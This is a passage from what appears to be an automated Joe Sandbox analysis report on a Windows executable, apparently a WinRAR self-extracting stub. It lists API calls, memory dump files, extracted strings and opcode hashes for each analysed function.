      • GetLastError.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC737F
      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73A9
      • FreeLibrary.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73EF
      • GetProcAddress.KERNEL32(?,?,00000000,00007FF741EC74F3,?,?,?,00007FF741EC525E,?,?,?,00007FF741EC5219), ref: 00007FF741EC73FB
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Library$Load$AddressErrorFreeLastProc
      • String ID: api-ms-
      • API String ID: 2559590344-2084034818
      • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
      • Instruction ID: 229fa94840f60d59dc57aaaba026ef103b6a180b1fb4bea50965094887970214
      • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
      • Instruction Fuzzy Hash: 3631C129A1E662C1EF13BB1AAC00575A295FF45BA1F994535DD1D47380EFBCE041C330
      APIs
      • GetModuleHandleW.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC162B
      • GetProcAddress.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC1648
      • GetProcAddress.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC1664
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AddressProc$HandleModule
      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
      • API String ID: 667068680-1718035505
      • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
      • Instruction ID: bdb2af7c78a56be480553086c3a77e6e1b3f7bcbac31d5408bde7ded33c973ae
      • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
      • Instruction Fuzzy Hash: A3111828B4DB23D2EF56BB10A940274A2917F08792FCC4435CA2D0A394FFBDA445C620
      APIs
        • Part of subcall function 00007FF741EA51A4: GetVersionExW.KERNEL32 ref: 00007FF741EA51D5
      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAED8C
      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAED98
      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDA8
      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDB6
      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDC4
      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEE05
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Time$File$System$Local$SpecificVersion
      • String ID:
      • API String ID: 2092733347-0
      • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
      • Instruction ID: 3f7e2860edb1839e9f0c01c545c2bc4970535fadaa668d58682124515e8e2915
      • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
      • Instruction Fuzzy Hash: 3B519BB6B04622CAEB04EFA8D4404AC77B1F748B89BA4803ADE1D57B58DB78E542C750
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Time$File$System$Local$SpecificVersion
      • String ID:
      • API String ID: 2092733347-0
      • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
      • Instruction ID: adf2ffd149c390ec13910f47a69edda83e24c036cecf2aded63277ec064c27dc
      • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
      • Instruction Fuzzy Hash: 2A317F66B04A52CDFB00EFB5D8801AC7370FF08749B94502ADE1D93A58EF78D485C310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: .rar$exe$rar$sfx
      • API String ID: 3668304517-630704357
      • Opcode ID: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
      • Instruction ID: 78491d58c7d1987c4e9227a1a516a444cd2ae0a157ec33f01778114cefd2b6c7
      • Opcode Fuzzy Hash: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
      • Instruction Fuzzy Hash: 7BA1B02AE1C626C0EB06FB25D8542B8A361BF45BD9F840231CE2D076E5DFBDE585C360
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: abort$CallEncodePointerTranslator
      • String ID: MOC$RCC
      • API String ID: 2889003569-2084237596
      • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
      • Instruction ID: 4289694f1f271ddc464fb7e7d98700a8e66a0757bf18d634451d247f2a74ceb2
      • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
      • Instruction Fuzzy Hash: 8791A177A08BA1CAE712FB65D8402ADBBB0FB04789F544129EE4C17755EF78D195CB00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
      • String ID: csm$f
      • API String ID: 2395640692-629598281
      • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
      • Instruction ID: 84fd4e6a13af180d7ae4e16df80385d091e3c9fb8d4ed01f232a75be68d08914
      • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
      • Instruction Fuzzy Hash: D151A33AB1D622C6DB16FB15EC44A29B795FF80B85F908034DE1A47748EFB8E841C750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
      • String ID: SeRestorePrivilege$SeSecurityPrivilege
      • API String ID: 2102711378-639343689
      • Opcode ID: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
      • Instruction ID: 279e2c3fa21b7184860ff4143170afb33ead13a7a2cd2a551ad89d281521f6d2
      • Opcode Fuzzy Hash: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
      • Instruction Fuzzy Hash: 4151D46AF1C762D5FB02FB61D8405B9A361BF867A5FC44130DE1D13696DEBCE485C220
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Window$Show$Rect
      • String ID: RarHtmlClassName
      • API String ID: 2396740005-1658105358
      • Opcode ID: 2556132b3669e06fd82c4edcfb73ee53acbff31ec70f5bbfd324b20a510b6699
      • Instruction ID: bc2bf18a8feeebba5b7ff239a15dce303c8823c35bc40d1eb8e28c425b8bb10d
      • Opcode Fuzzy Hash: 2556132b3669e06fd82c4edcfb73ee53acbff31ec70f5bbfd324b20a510b6699
      • Instruction Fuzzy Hash: C551A329A0D752CAEB26FB25E44437AE361FB89B81F844134DE8E03B95DF7CE0418B10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
      • String ID: sfxcmd$sfxpar
      • API String ID: 3540648995-3493335439
      • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
      • Instruction ID: a4b6b81efd863c1d0c53fd96057e12ab091b14b6fbe4760c14aec234e3de5a6d
      • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
      • Instruction Fuzzy Hash: 92319435A18A26C4EB01FB65E8841BCB371FB84B99F940231DE6D177A9DFB8D041C354
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID:
      • String ID: RENAMEDLG$REPLACEFILEDLG
      • API String ID: 0-56093855
      • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
      • Instruction ID: e74ef55112ac617a950c8d1aec52be18cb2872c7d0884eadc731505f0fc8c493
      • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
      • Instruction Fuzzy Hash: 26211B29D0DB67E0FB12FB15A844174A3A0FB8AB8AFD40136D94D47360DEBCE1958360
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AddressFreeHandleLibraryModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 4061214504-1276376045
      • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
      • Instruction ID: 57e74cf343bd08d11dbfa7e4034522ad81ce1d3fa4c1f1c075805c9b879fa281
      • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
      • Instruction Fuzzy Hash: 67F0A429A1DA53C1EF46BB12E840679A3A0BF88B91F881039D96F43255DF7CE485C710
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
      • Instruction ID: 12d11afe743c0751e8943e5f68528fcc3d21e701fc9190b92e4c57b1e0cd28c7
      • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
      • Instruction Fuzzy Hash: 1881E52AF1C663C5F712BB25D8406BCE6A0BB65B8AF894131DD2E13A95DFBCD401C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 2398171386-0
      • Opcode ID: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
      • Instruction ID: 7cf92ca3c994d7362ab910f57b7c060355ea3f51b0cc90620aa997ac4354b10a
      • Opcode Fuzzy Hash: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
      • Instruction Fuzzy Hash: ED51E32AB0CA12CAFB12FB65E9402BDA372BB447E9F844635DE1E466D4DF789445C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
      • String ID:
      • API String ID: 3659116390-0
      • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
      • Instruction ID: b750a9f499c66c651a395236c6da5c8f8dfaaf8538d8a5ece02cc058bb4aed90
      • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
      • Instruction Fuzzy Hash: 5F51EF76B18A62C9E712FB35D8403ACBBB0BB54789F488135CE5A57A98DF78D046C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ByteCharMultiWide$AllocString
      • String ID:
      • API String ID: 262959230-0
      • Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
      • Instruction ID: 5fa7045dbd50b7ccb1587f1c98bfc29980e5573ba77c7082cfa3d7b3573b60e4
      • Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
      • Instruction Fuzzy Hash: 4E41DB39A0D6A6C9E716BF219840378A291FF04BA5F944634EB6D877D5EFBDD041C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AddressProc
      • String ID:
      • API String ID: 190572456-0
      • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
      • Instruction ID: 89899596785edb27fb49f52772c08571e47c45f6205b7c0fe660faf5797ac589
      • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
      • Instruction Fuzzy Hash: 1541E169B0DA22C1FB17BB12AC00675E296BF14B91F898535DE1E4B754EFBCE401C360
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
      • Instruction ID: 0e0715a6753a58501a399daefde03daa6b2912afb5cfd7915178b296de746e48
      • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
      • Instruction Fuzzy Hash: 0611C43EE1C727C1F7563128E54137981617F453A2FEE8634EA7D065D6CEECA4404325
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
